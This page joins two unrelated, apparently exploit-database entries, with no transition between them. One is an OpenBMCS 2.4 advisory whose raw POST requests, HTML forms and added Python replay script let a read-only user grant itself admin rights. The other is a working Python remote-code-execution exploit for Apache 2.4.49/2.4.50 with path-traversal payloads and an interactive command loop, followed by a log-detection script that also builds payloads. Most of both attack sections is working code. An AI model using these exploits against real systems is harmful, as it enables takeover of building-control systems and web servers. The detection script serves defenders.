<pre><code><br />OpenBMCS 2.4 Create Admin / Remote Privilege Escalation<br /><br /><br />Vendor: OPEN BMCS<br />Product web page: https://www.openbmcs.com<br />Affected version: 2.4<br /><br />Summary: Building Management & Controls System (BMCS). No matter what the<br />size of your business, the OpenBMCS software has the ability to expand to<br />hundreds of controllers. Our product can control and monitor anything from<br />a garage door to a complete campus wide network, with everything you need<br />on board.<br /><br />Desc: The application suffers from an insecure permissions vulnerability that<br />allows privilege escalation. The PHP scripts in the '/plugins/useradmin/'<br />directory do not verify that the caller holds user-administration rights, so<br />a regular (read-only) user can create administrative users and/or elevate<br />their own privileges by sending crafted HTTP POST requests to those scripts.<br /><br />Tested on: Linux Ubuntu 5.4.0-65-generic (x86_64)<br /> Linux Debian 4.9.0-13-686-pae/4.9.228-1 (i686)<br /> Apache/2.4.41 (Ubuntu)<br /> Apache/2.4.25 (Debian)<br /> nginx/1.16.1<br /> PHP/7.4.3<br /> PHP/7.0.33-0+deb9u9<br /><br /><br />Vulnerability discovered by Gjoko 'LiquidWorm' Krstic<br /> @zeroscience<br /><br /><br />Advisory ID: ZSL-2022-5693<br />Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5693.php<br /><br /><br />26.10.2021<br /><br />--<br /><br /><br />List current ID and permissions (read):<br />---------------------------------------<br /><br />POST /plugins/useradmin/getUserDetails.php HTTP/1.1<br />Host: 192.168.1.222<br />Cookie: PHPSESSID=ecr4lvcqvkdae4eimf3ktqeqn4<br />Content-Length: 16<br />Sec-Ch-Ua: "Chromium";v="95", ";Not A Brand";v="99"<br />Accept: */*<br />Content-Type: application/x-www-form-urlencoded; charset=UTF-8<br />X-Requested-With: XMLHttpRequest<br />Sec-Ch-Ua-Mobile: ?0<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.54 Safari/537.36<br />Sec-Ch-Ua-Platform: "Windows"<br />Origin: https://192.168.1.222<br />Sec-Fetch-Site: 
same-origin<br />Sec-Fetch-Mode: cors<br />Sec-Fetch-Dest: empty<br />Referer: https://192.168.1.222/index.php<br />Accept-Encoding: gzip, deflate<br />Accept-Language: en-US,en;q=0.9<br />Connection: close<br /><br />id_list%5B%5D=17<br /><br /><br />HTTP/1.1 200 OK<br />Date: Tue, 16 Nov 2021 20:56:53 GMT<br />Server: Apache/2.4.41 (Ubuntu)<br />Expires: Thu, 19 Nov 1981 08:52:00 GMT<br />Cache-Control: no-store, no-cache, must-revalidate<br />Pragma: no-cache<br />Vary: Accept-Encoding<br />Content-Length: 692<br />Connection: close<br />Content-Type: text/html; charset=UTF-8<br /><br />[{"user_id":"17","username":"testingus","email":"","expiry_date":null,"fullname":"test","phone":"","module_id":"useradmin","usermodule_permission":"1","permissions":[{"user_id":"17","module_id":"alarms","permissions":"1","mod_home":"1"},{"user_id":"17","module_id":"controllers","permissions":"1","mod_home":"1"},{"user_id":"17","module_id":"core","permissions":"0","mod_home":"0"},{"user_id":"17","module_id":"graphics","permissions":"1","mod_home":"1"},{"user_id":"17","module_id":"history","permissions":"1","mod_home":"1"},{"user_id":"17","module_id":"progtool","permissions":"1","mod_home":"0"},{"user_id":"17","module_id":"useradmin","permissions":"1","mod_home":"0"}],"human-date":""}]<br /><br /><br /><br />List current ID and permissions (admin):<br />----------------------------------------<br /><br />POST /plugins/useradmin/getUserDetails.php HTTP/1.1<br />Host: 192.168.1.222<br />Cookie: PHPSESSID=ecr4lvcqvkdae4eimf3ktqeqn4<br />Content-Length: 16<br />Sec-Ch-Ua: "Chromium";v="95", ";Not A Brand";v="99"<br />Accept: */*<br />Content-Type: application/x-www-form-urlencoded; charset=UTF-8<br />X-Requested-With: XMLHttpRequest<br />Sec-Ch-Ua-Mobile: ?0<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.54 Safari/537.36<br />Sec-Ch-Ua-Platform: "Windows"<br />Origin: https://192.168.1.222<br />Sec-Fetch-Site: 
same-origin<br />Sec-Fetch-Mode: cors<br />Sec-Fetch-Dest: empty<br />Referer: https://192.168.1.222/index.php<br />Accept-Encoding: gzip, deflate<br />Accept-Language: en-US,en;q=0.9<br />Connection: close<br /><br />id_list%5B%5D=18<br /><br />HTTP/1.1 200 OK<br />Date: Tue, 16 Nov 2021 20:56:36 GMT<br />Server: Apache/2.4.41 (Ubuntu)<br />Expires: Thu, 19 Nov 1981 08:52:00 GMT<br />Cache-Control: no-store, no-cache, must-revalidate<br />Pragma: no-cache<br />Vary: Accept-Encoding<br />Content-Length: 725<br />Connection: close<br />Content-Type: text/html; charset=UTF-8<br /><br />[{"user_id":"18","username":"testingus2","email":"testingus@test.tld","expiry_date":null,"fullname":"TestName","phone":"1112223333","module_id":"useradmin","usermodule_permission":"4","permissions":[{"user_id":"18","module_id":"alarms","permissions":"3","mod_home":"1"},{"user_id":"18","module_id":"controllers","permissions":"2","mod_home":"1"},{"user_id":"18","module_id":"core","permissions":"1","mod_home":"0"},{"user_id":"18","module_id":"graphics","permissions":"4","mod_home":"1"},{"user_id":"18","module_id":"history","permissions":"3","mod_home":"1"},{"user_id":"18","module_id":"progtool","permissions":"3","mod_home":"0"},{"user_id":"18","module_id":"useradmin","permissions":"4","mod_home":"0"}],"human-date":""}]<br /><br /><br /><br />Escalate privileges:<br />--------------------<br /><br />POST /plugins/useradmin/update_user_permissions.php HTTP/1.1<br />Host: 192.168.1.222<br />Cookie: PHPSESSID=ecr4lvcqvkdae4eimf3ktqeqn4<br />Content-Length: 702<br />Sec-Ch-Ua: "Chromium";v="95", ";Not A Brand";v="99"<br />Accept: */*<br />Content-Type: application/x-www-form-urlencoded; charset=UTF-8<br />X-Requested-With: XMLHttpRequest<br />Sec-Ch-Ua-Mobile: ?0<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.54 Safari/537.36<br />Sec-Ch-Ua-Platform: "Windows"<br />Origin: https://192.168.1.222<br />Sec-Fetch-Site: 
same-origin<br />Sec-Fetch-Mode: cors<br />Sec-Fetch-Dest: empty<br />Referer: https://192.168.1.222/index.php<br />Accept-Encoding: gzip, deflate<br />Accept-Language: en-US,en;q=0.9<br />Connection: close<br /><br />permissions%5B0%5D%5Bpermissions%5D=3&permissions%5B0%5D%5BmoduleID%5D=alarms&permissions%5B0%5D%5Bmod_home%5D=1&permissions%5B1%5D%5Bpermissions%5D=2&permissions%5B1%5D%5BmoduleID%5D=controllers&permissions%5B1%5D%5Bmod_home%5D=1&permissions%5B2%5D%5Bpermissions%5D=1&permissions%5B2%5D%5BmoduleID%5D=core&permissions%5B3%5D%5Bpermissions%5D=4&permissions%5B3%5D%5BmoduleID%5D=graphics&permissions%5B3%5D%5Bmod_home%5D=1&permissions%5B4%5D%5Bpermissions%5D=3&permissions%5B4%5D%5BmoduleID%5D=history&permissions%5B4%5D%5Bmod_home%5D=1&permissions%5B5%5D%5Bpermissions%5D=3&permissions%5B5%5D%5BmoduleID%5D=progtool&permissions%5B6%5D%5Bpermissions%5D=4&permissions%5B6%5D%5BmoduleID%5D=useradmin&id=17<br /><br /><br />HTTP/1.1 200 OK<br />Date: Tue, 16 Nov 2021 20:58:48 GMT<br />Server: Apache/2.4.41 (Ubuntu)<br />Expires: Thu, 19 Nov 1981 08:52:00 GMT<br />Cache-Control: no-store, no-cache, must-revalidate<br />Pragma: no-cache<br />Content-Length: 1<br />Connection: close<br />Content-Type: text/html; charset=UTF-8<br /><br />2<br /><br /><br /><br />Create admin from read user:<br />----------------------------<br /><br />POST /plugins/useradmin/create_user.php HTTP/1.1<br />Host: 192.168.1.222<br />Cookie: PHPSESSID=ecr4lvcqvkdae4eimf3ktqeqn4<br />Content-Length: 1010<br />Sec-Ch-Ua: "Chromium";v="95", ";Not A Brand";v="99"<br />Accept: */*<br />Content-Type: application/x-www-form-urlencoded; charset=UTF-8<br />X-Requested-With: XMLHttpRequest<br />Sec-Ch-Ua-Mobile: ?0<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.54 Safari/537.36<br />Sec-Ch-Ua-Platform: "Windows"<br />Origin: https://192.168.1.222<br />Sec-Fetch-Site: same-origin<br />Sec-Fetch-Mode: cors<br />Sec-Fetch-Dest: empty<br 
/>Referer: https://192.168.1.222/index.php<br />Accept-Encoding: gzip, deflate<br />Accept-Language: en-US,en;q=0.9<br />Connection: close<br /><br />user%5Busername%5D=testingus2&user%5Bfullname%5D=TestName&user%5Bphone%5D=1112223333&user%5Bpassword%5D=Password123&user%5BpasswordConfirm%5D=Password123&user%5Bemail%5D=testingus%40test.tld&user%5Bexpiry%5D=&permissions%5B0%5D%5BmoduleID%5D=alarms&permissions%5B0%5D%5Bpermissions%5D=3&permissions%5B0%5D%5Bmod_home%5D=1&permissions%5B1%5D%5BmoduleID%5D=controllers&permissions%5B1%5D%5Bpermissions%5D=2&permissions%5B1%5D%5Bmod_home%5D=1&permissions%5B2%5D%5BmoduleID%5D=core&permissions%5B2%5D%5Bpermissions%5D=1&permissions%5B2%5D%5Bmod_home%5D=0&permissions%5B3%5D%5BmoduleID%5D=graphics&permissions%5B3%5D%5Bpermissions%5D=4&permissions%5B3%5D%5Bmod_home%5D=1&permissions%5B4%5D%5BmoduleID%5D=history&permissions%5B4%5D%5Bpermissions%5D=3&permissions%5B4%5D%5Bmod_home%5D=1&permissions%5B5%5D%5BmoduleID%5D=progtool&permissions%5B5%5D%5Bpermissions%5D=3&permissions%5B5%5D%5Bmod_home%5D=0&permissions%5B6%5D%5BmoduleID%5D=useradmin&permissions%5B6%5D%5Bpermissions%5D=4&permissions%5B6%5D%5Bmod_home%5D=0<br /><br /><br />HTTP/1.1 200 OK<br />Date: Tue, 16 Nov 2021 20:18:58 GMT<br />Server: Apache/2.4.41 (Ubuntu)<br />Expires: Thu, 19 Nov 1981 08:52:00 GMT<br />Cache-Control: no-store, no-cache, must-revalidate<br />Pragma: no-cache<br />Content-Length: 20<br />Connection: close<br />Content-Type: text/html; charset=UTF-8<br /><br />{"status":"success"}<br /><br /><br /><br />PoC escalate from editor to admin:<br />----------------------------------<br /><br /><html><br /> <body><br /> <form action="https://192.168.1.222/plugins/useradmin/update_user_permissions.php" method="POST"><br /> <input type="hidden" name="permissions[0][permissions]" value="3" /><br /> <input type="hidden" name="permissions[0][moduleID]" value="alarms" /><br /> <input type="hidden" name="permissions[0][mod_home]" value="1" /><br /> <input type="hidden" 
name="permissions[1][permissions]" value="2" /><br /> <input type="hidden" name="permissions[1][moduleID]" value="controllers" /><br /> <input type="hidden" name="permissions[1][mod_home]" value="1" /><br /> <input type="hidden" name="permissions[2][permissions]" value="1" /><br /> <input type="hidden" name="permissions[2][moduleID]" value="core" /><br /> <input type="hidden" name="permissions[3][permissions]" value="4" /><br /> <input type="hidden" name="permissions[3][moduleID]" value="graphics" /><br /> <input type="hidden" name="permissions[3][mod_home]" value="1" /><br /> <input type="hidden" name="permissions[4][permissions]" value="3" /><br /> <input type="hidden" name="permissions[4][moduleID]" value="history" /><br /> <input type="hidden" name="permissions[4][mod_home]" value="1" /><br /> <input type="hidden" name="permissions[5][permissions]" value="3" /><br /> <input type="hidden" name="permissions[5][moduleID]" value="progtool" /><br /> <input type="hidden" name="permissions[6][permissions]" value="4" /><br /> <input type="hidden" name="permissions[6][moduleID]" value="useradmin" /><br /> <input type="hidden" name="id" value="17" /><br /> <input type="submit" value="Esc" /><br /> </form><br /> </body><br /></html><br /><br /><br /><br />PoC create admin from editor:<br />-----------------------------<br /><br /><html><br /> <body><br /> <form action="https://192.168.1.222/plugins/useradmin/create_user.php" method="POST"><br /> <input type="hidden" name="user[username]" value="testingus2" /><br /> <input type="hidden" name="user[fullname]" value="TestName" /><br /> <input type="hidden" name="user[phone]" value="1112223333" /><br /> <input type="hidden" name="user[password]" value="Password123" /><br /> <input type="hidden" name="user[passwordConfirm]" value="Password123" /><br /> <input type="hidden" name="user[email]" value="testingus@test.tld" /><br /> <input type="hidden" name="user[expiry]" value="" /><br /> <input type="hidden" 
name="permissions[0][moduleID]" value="alarms" /><br /> <input type="hidden" name="permissions[0][permissions]" value="3" /><br /> <input type="hidden" name="permissions[0][mod_home]" value="1" /><br /> <input type="hidden" name="permissions[1][moduleID]" value="controllers" /><br /> <input type="hidden" name="permissions[1][permissions]" value="2" /><br /> <input type="hidden" name="permissions[1][mod_home]" value="1" /><br /> <input type="hidden" name="permissions[2][moduleID]" value="core" /><br /> <input type="hidden" name="permissions[2][permissions]" value="1" /><br /> <input type="hidden" name="permissions[2][mod_home]" value="0" /><br /> <input type="hidden" name="permissions[3][moduleID]" value="graphics" /><br /> <input type="hidden" name="permissions[3][permissions]" value="4" /><br /> <input type="hidden" name="permissions[3][mod_home]" value="1" /><br /> <input type="hidden" name="permissions[4][moduleID]" value="history" /><br /> <input type="hidden" name="permissions[4][permissions]" value="3" /><br /> <input type="hidden" name="permissions[4][mod_home]" value="1" /><br /> <input type="hidden" name="permissions[5][moduleID]" value="progtool" /><br /> <input type="hidden" name="permissions[5][permissions]" value="3" /><br /> <input type="hidden" name="permissions[5][mod_home]" value="0" /><br /> <input type="hidden" name="permissions[6][moduleID]" value="useradmin" /><br /> <input type="hidden" name="permissions[6][permissions]" value="4" /><br /> <input type="hidden" name="permissions[6][mod_home]" value="0" /><br /> <input type="submit" value="Cre" /><br /> </form><br /> </body><br /></html><br /></code></pre>
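The captured requests above can be turned into a repeatable authorisation check: snapshot the caller's own permission record, replay the escalation body for the caller's own id, snapshot again and diff. The script below is an added example, not code from the ZSL advisory or from OpenBMCS. The endpoint paths, the form field names and the two JSON samples are taken from the advisory's captures; the target host, the session cookie, the helper names and the reading of `useradmin` level 4 as "full user administration" are assumptions. The `php_form` helper reproduces PHP's nested-array form encoding (`permissions[0][moduleID]=...`) so the body it builds is byte-for-byte the advisory's escalation request.

```python
"""Check whether an OpenBMCS /plugins/useradmin/ install lets a low-privilege
account rewrite its own permissions, by diffing two getUserDetails.php
snapshots taken around one update_user_permissions.php call.

Added example; not code from the ZSL-2022-5693 advisory or from the vendor.
Endpoint paths and field names come from the advisory's captures; host,
cookie, helper names and the meaning of useradmin level 4 are assumptions.
"""
import json
import urllib.error
import urllib.request
from urllib.parse import urlencode

GET_DETAILS = "/plugins/useradmin/getUserDetails.php"
UPDATE_PERMS = "/plugins/useradmin/update_user_permissions.php"

# Permission rows of the advisory's escalation request, in the order the
# captured body sends them (level meanings inferred from the samples only).
ADMIN_PERMISSIONS = [
    {"permissions": 3, "moduleID": "alarms", "mod_home": 1},
    {"permissions": 2, "moduleID": "controllers", "mod_home": 1},
    {"permissions": 1, "moduleID": "core"},
    {"permissions": 4, "moduleID": "graphics", "mod_home": 1},
    {"permissions": 3, "moduleID": "history", "mod_home": 1},
    {"permissions": 3, "moduleID": "progtool"},
    {"permissions": 4, "moduleID": "useradmin"},
]

# The two getUserDetails.php responses captured in the advisory (user 17 is
# the read-only account, user 18 the admin), kept here as offline samples.
SAMPLE_READ_USER = '[{"user_id":"17","username":"testingus","email":"","expiry_date":null,"fullname":"test","phone":"","module_id":"useradmin","usermodule_permission":"1","permissions":[{"user_id":"17","module_id":"alarms","permissions":"1","mod_home":"1"},{"user_id":"17","module_id":"controllers","permissions":"1","mod_home":"1"},{"user_id":"17","module_id":"core","permissions":"0","mod_home":"0"},{"user_id":"17","module_id":"graphics","permissions":"1","mod_home":"1"},{"user_id":"17","module_id":"history","permissions":"1","mod_home":"1"},{"user_id":"17","module_id":"progtool","permissions":"1","mod_home":"0"},{"user_id":"17","module_id":"useradmin","permissions":"1","mod_home":"0"}],"human-date":""}]'
SAMPLE_ADMIN_USER = '[{"user_id":"18","username":"testingus2","email":"testingus@test.tld","expiry_date":null,"fullname":"TestName","phone":"1112223333","module_id":"useradmin","usermodule_permission":"4","permissions":[{"user_id":"18","module_id":"alarms","permissions":"3","mod_home":"1"},{"user_id":"18","module_id":"controllers","permissions":"2","mod_home":"1"},{"user_id":"18","module_id":"core","permissions":"1","mod_home":"0"},{"user_id":"18","module_id":"graphics","permissions":"4","mod_home":"1"},{"user_id":"18","module_id":"history","permissions":"3","mod_home":"1"},{"user_id":"18","module_id":"progtool","permissions":"3","mod_home":"0"},{"user_id":"18","module_id":"useradmin","permissions":"4","mod_home":"0"}],"human-date":""}]'


def php_form(fields):
    """Flatten nested dicts/lists into PHP's bracket syntax, e.g.
    permissions[0][moduleID]=alarms; urlencode percent-encodes the brackets
    (%5B/%5D) exactly as the advisory's request bodies show."""
    pairs = []

    def walk(prefix, value):
        if isinstance(value, dict):
            for key, item in value.items():
                walk(f"{prefix}[{key}]", item)
        elif isinstance(value, list):
            # PHP accepts a numeric index where the UI sends id_list[].
            for index, item in enumerate(value):
                walk(f"{prefix}[{index}]", item)
        else:
            pairs.append((prefix, value))

    for name, value in fields.items():
        walk(name, value)
    return urlencode(pairs)


def permission_map(details_json):
    """Reduce one getUserDetails.php record to {module_id: level}."""
    record = json.loads(details_json)[0]
    return {p["module_id"]: int(p["permissions"]) for p in record["permissions"]}


def escalated_modules(before, after):
    """Modules whose level rose between two snapshots of the same user."""
    return sorted(m for m, lvl in after.items() if lvl > before.get(m, 0))


def is_admin(perms, admin_level=4):
    """Assumption: useradmin level 4 is full user administration."""
    return perms.get("useradmin", 0) >= admin_level


def post_form(base_url, path, fields, phpsessid, ctx=None):
    """POST a PHP-style form with the captured session cookie. For a lab box
    with a self-signed certificate pass an ssl.SSLContext as ctx."""
    req = urllib.request.Request(
        base_url + path,
        data=php_form(fields).encode(),
        headers={
            "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8",
            "X-Requested-With": "XMLHttpRequest",
            "Cookie": f"PHPSESSID={phpsessid}",
        },
        method="POST",
    )
    with urllib.request.urlopen(req, timeout=10, context=ctx) as resp:
        return resp.read().decode()


def check_escalation(base_url, phpsessid, my_id, ctx=None):
    """Snapshot our own record, push the admin permission set for our own id,
    snapshot again. A server that enforces authorisation rejects the update
    (HTTP error) or leaves the levels unchanged, so the result is empty.
    On a vulnerable server this really does change the account's rights."""
    me = {"id_list": [my_id]}
    before = permission_map(post_form(base_url, GET_DETAILS, me, phpsessid, ctx))
    try:
        post_form(base_url, UPDATE_PERMS, {"permissions": ADMIN_PERMISSIONS, "id": my_id}, phpsessid, ctx)
    except urllib.error.HTTPError:
        return []
    after = permission_map(post_form(base_url, GET_DETAILS, me, phpsessid, ctx))
    return escalated_modules(before, after)
```

Usage against the lab host from the advisory would be `check_escalation("https://192.168.1.222", "<PHPSESSID of the read-only user>", 17)`; for a self-signed certificate build an `ssl.create_default_context()`, set `check_hostname = False` and `verify_mode = ssl.CERT_NONE`, and pass it as `ctx`. A non-empty list means the server let a non-admin session raise its own levels, which is the condition the advisory describes; an empty list means the update was refused or had no effect. Note that `update_user_permissions.php` returns a bare `2` in the capture above, so the check relies on the re-read snapshot rather than on interpreting that status.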
<pre><code># Exploit Title: Apache HTTP Server 2.4.50 - Remote Code Execution (RCE) (3)<br /># Date: 11/11/2021<br /># Exploit Author: Valentin Lobstein<br /># Vendor Homepage: https://apache.org/<br /># Software Link: https://github.com/Balgogan/CVE-2021-41773<br /># Version: Apache 2.4.49/2.4.50 (CGI enabled)<br /># Tested on: Debian GNU/Linux<br /># CVE : CVE-2021-41773 / CVE-2021-42013<br /># Credits : Lucas Schnell<br /><br /><br />#!/usr/bin/env python3<br />#coding: utf-8<br /><br />import os<br />import sys<br />import time<br />import requests<br />from colorama import Fore,Style<br /><br /><br />header = '''\033[1;91m<br /> <br /> ▄▄▄ ██▓███ ▄▄▄ ▄████▄ ██░ ██ ▓█████ ██▀███ ▄████▄ ▓█████ <br /> ▒████▄ ▓██░ ██▒▒████▄ ▒██▀ ▀█ ▓██░ ██▒▓█ ▀ ▓██ ▒ ██▒▒██▀ ▀█ ▓█ ▀ <br /> ▒██ ▀█▄ ▓██░ ██▓▒▒██ ▀█▄ ▒▓█ ▄ ▒██▀▀██░▒███ ▓██ ░▄█ ▒▒▓█ ▄ ▒███ <br /> ░██▄▄▄▄██ ▒██▄█▓▒ ▒░██▄▄▄▄██ ▒▓▓▄ ▄██▒░▓█ ░██ ▒▓█ ▄ ▒██▀▀█▄ ▒▓▓▄ ▄██▒▒▓█ ▄ <br /> ▓█ ▓██▒▒██▒ ░ ░ ▓█ ▓██▒▒ ▓███▀ ░░▓█▒░██▓░▒████▒ ░██▓ ▒██▒▒ ▓███▀ ░░▒████▒<br /> ▒▒ ▓▒█░▒▓▒░ ░ ░ ▒▒ ▓▒█░░ ░▒ ▒ ░ ▒ ░░▒░▒░░ ▒░ ░ ░ ▒▓ ░▒▓░░ ░▒ ▒ ░░░ ▒░ ░<br /> ▒ ▒▒ ░░▒ ░ ▒ ▒▒ ░ ░ ▒ ▒ ░▒░ ░ ░ ░ ░ ░▒ ░ ▒░ ░ ▒ ░ ░ ░<br /> ░ ▒ ░░ ░ ▒ ░ ░ ░░ ░ ░ ░░ ░ ░ ░ <br />''' + Style.RESET_ALL<br /><br /><br />if len(sys.argv) < 2 :<br />    print( 'Use: python3 file.py ip:port ' )<br />    sys.exit()<br /><br />def end():<br />    print("\t\033[1;91m[!] Bye bye !")<br />    time.sleep(0.5)<br />    sys.exit(1)<br /><br />def commands(url,command,session):<br />    # Fake prompt built from three blind commands. Every command is a separate<br />    # request, so no state (cwd, env, background jobs) survives between them.<br />    directory = mute_command(url,'pwd')<br />    user = mute_command(url,'whoami')<br />    hostname = mute_command(url,'hostname')<br />    print(Fore.YELLOW + 'Reverse shell is advised (This isn\'t an interactive shell)')<br />    command = input(f"{Fore.RED}╭─{Fore.GREEN + user}@{hostname}: {Fore.BLUE + directory}\n{Fore.RED}╰─{Fore.YELLOW}$ {Style.RESET_ALL}")<br />    # The POST body reaches /bin/bash on stdin. The leading 'echo;' prints the<br />    # empty line that terminates the CGI header block, so the command output<br />    # comes back as the HTTP response body instead of a 500.<br />    command = f"echo; {command};"<br />    req = requests.Request('POST', url=url, data=command)<br />    prepare = req.prepare()<br />    # requests re-quotes the URL in prepare() and would decode %2e / %%32%65<br />    # back to '.', neutralising the traversal; put the raw path back.<br />    prepare.url = url<br />    response = session.send(prepare, timeout=5)<br />    output = response.text<br />    print(output)<br />    if 'clear' in command:<br />        os.system('/usr/bin/clear')<br />        print(header)<br />    if 'exit' in command:<br />        end()<br /><br />def mute_command(url,command):<br />    # Same request as above but silent; used for the prompt fields.<br />    session = requests.Session()<br />    req = requests.Request('POST', url=url, data=f"echo; {command}")<br />    prepare = req.prepare()<br />    prepare.url = url<br />    response = session.send(prepare, timeout=5)<br />    return response.text.strip()<br /><br /><br />def exploitRCE(payload):<br />    try:<br />        host = sys.argv[1]<br />        if 'http' not in host:<br />            url = 'http://'+ host + payload<br />        else:<br />            url = host + payload<br />        session = requests.Session()<br />        # Vulnerability check: 'id' through the traversal must come back with a uid.<br />        command = "echo; id"<br />        req = requests.Request('POST', url=url, data=command)<br />        prepare = req.prepare()<br />        prepare.url = url<br />        response = session.send(prepare, timeout=5)<br />        output = response.text<br />        if "uid" in output:<br />            print( Fore.GREEN + '\n[!] Target %s is vulnerable !!!' % host)<br />            print("[!] Output:\n\n" + Fore.YELLOW + output )<br />            choice = input(Fore.CYAN + "[?] Do you want to exploit this RCE ? (Y/n) : ")<br />            if choice.lower() in ['','y','yes']:<br />                while True:<br />                    commands(url,command,session)<br />            else:<br />                end()<br />        else :<br />            print(Fore.RED + '\nTarget %s isn\'t vulnerable' % host)<br />    except KeyboardInterrupt:<br />        end()<br /><br />def main():<br />    try:<br />        # 2.4.49 (CVE-2021-41773): path normalisation misses %2e, so one decode<br />        # pass yields '..' segments that climb out of the cgi-bin directory.<br />        apache2449_payload = '/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/bin/bash'<br />        # 2.4.50 (CVE-2021-42013): the fix decodes once, so double-encoded dots<br />        # (%%32%65 -> %2e -> .) still get through.<br />        apache2450_payload = '/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/bash'<br />        payloads = [apache2449_payload,apache2450_payload]<br />        choice = len(payloads) + 1<br />        print(header)<br />        print("\033[1;37m[0] Apache 2.4.49 RCE\n[1] Apache 2.4.50 RCE")<br />        while choice >= len(payloads) and choice >= 0:<br />            choice = int(input('[~] Choice : '))<br />            if choice < len(payloads):<br />                exploitRCE(payloads[choice])<br />    except KeyboardInterrupt:<br />        print("\n\033[1;91m[!] Bye bye !")<br />        time.sleep(0.5)<br />        sys.exit(1)<br /><br />if __name__ == '__main__':<br />    main()<br /> <br /></code></pre>
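The two payloads in `main()` differ only in how many URL-decode passes it takes before the path contains real `..` segments: one for the 2.4.49 bug, two for the 2.4.50 double-encoding bypass. That is also what a defender needs to reproduce when reading access logs, because Apache logs the request line as received and a grep for `../` misses both forms. The script below is an added example, not part of the exploit above and not Apache code: it decodes the path of each logged request zero, one and two times, flags the first pass at which the resolved path climbs above the root, and leaves query-string dots and ordinary `/icons/../index.html` style requests alone. The log lines are constructed for the example, not real traffic; the only material taken from the page is the two payload encodings, which `traversal_payload` generalises to any depth.

```python
"""Flag CVE-2021-41773 / CVE-2021-42013 traversal attempts in Apache access
logs, and build the two payload encodings the exploit uses for any depth.

Added example, not part of the exploit script or of Apache. SAMPLE_LOG is
constructed; the %2e and %%32%65 encodings are the ones the script uses.
"""
import re
from urllib.parse import unquote

# Constructed combined-log-format lines: two attack attempts from one client,
# then two benign requests that a naive grep for '..' or '%2e' would flag.
SAMPLE_LOG = """\
10.0.0.5 - - [11/Nov/2021:10:00:01 +0000] "POST /cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/bin/bash HTTP/1.1" 200 42 "-" "python-requests/2.26.0"
10.0.0.5 - - [11/Nov/2021:10:00:02 +0000] "POST /cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/bash HTTP/1.1" 200 42 "-" "python-requests/2.26.0"
10.0.0.7 - - [11/Nov/2021:10:00:03 +0000] "GET /cgi-bin/status.cgi?next=%2e%2e%2fdocs HTTP/1.1" 200 128 "-" "curl/7.74.0"
10.0.0.9 - - [11/Nov/2021:10:00:04 +0000] "GET /icons/../index.html HTTP/1.1" 200 196 "-" "Mozilla/5.0"
"""

# Client address plus the quoted request line; the rest of the line is ignored.
REQUEST_RE = re.compile(r'^(?P<ip>\S+) .*"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')


def decode_path(target, passes):
    """Percent-decode the path part of a request target `passes` times.
    One pass turns %2e into '.', which 2.4.49 failed to normalise; the 2.4.50
    fix decodes once, so the bypass needs two (%%32%65 -> %2e -> .)."""
    path = target.split("?", 1)[0]
    for _ in range(passes):
        path = unquote(path)
    return path


def escapes_root(path):
    """True when resolving the '..' segments climbs above '/', which is what
    turns a /cgi-bin/ request into a path outside the script directory."""
    depth = 0
    for seg in path.split("/"):
        if seg == "..":
            depth -= 1
            if depth < 0:
                return True
        elif seg not in ("", "."):
            depth += 1
    return False


def traversal_passes(target, max_passes=2):
    """Smallest number of decode passes after which the path escapes the root:
    0 = plain '..', 1 = 41773-style, 2 = 42013-style, None = benign."""
    for n in range(max_passes + 1):
        if escapes_root(decode_path(target, n)):
            return n
    return None


def find_traversal(log_text):
    """Return (client_ip, passes, decoded_path) for every flagged line."""
    hits = []
    for line in log_text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue
        n = traversal_passes(m.group("target"))
        if n is not None:
            hits.append((m.group("ip"), n, decode_path(m.group("target"), n)))
    return hits


def traversal_payload(depth, target="/bin/bash", double=False):
    """Build a cgi-bin traversal of `depth` levels in the script's two
    encodings: '.%2e' per level for 2.4.49, '.%%32%65' for 2.4.50."""
    dot = ".%%32%65" if double else ".%2e"
    return "/cgi-bin/" + "/".join([dot] * depth) + target


if __name__ == "__main__":
    for ip, n, path in find_traversal(SAMPLE_LOG):
        print(f"{ip}  decode passes={n}  {path}")
```

Running it on the constructed log prints the two `10.0.0.5` requests, both resolving to `/cgi-bin/../../../../../bin/bash`, with pass counts 1 and 2 respectively; the `status.cgi` query-string dots and the `/icons/../index.html` request are not reported. The pass count is worth keeping in an alert: a count of 2 on a server that was patched to 2.4.50 tells you the attacker is specifically using the CVE-2021-42013 bypass rather than replaying the older payload.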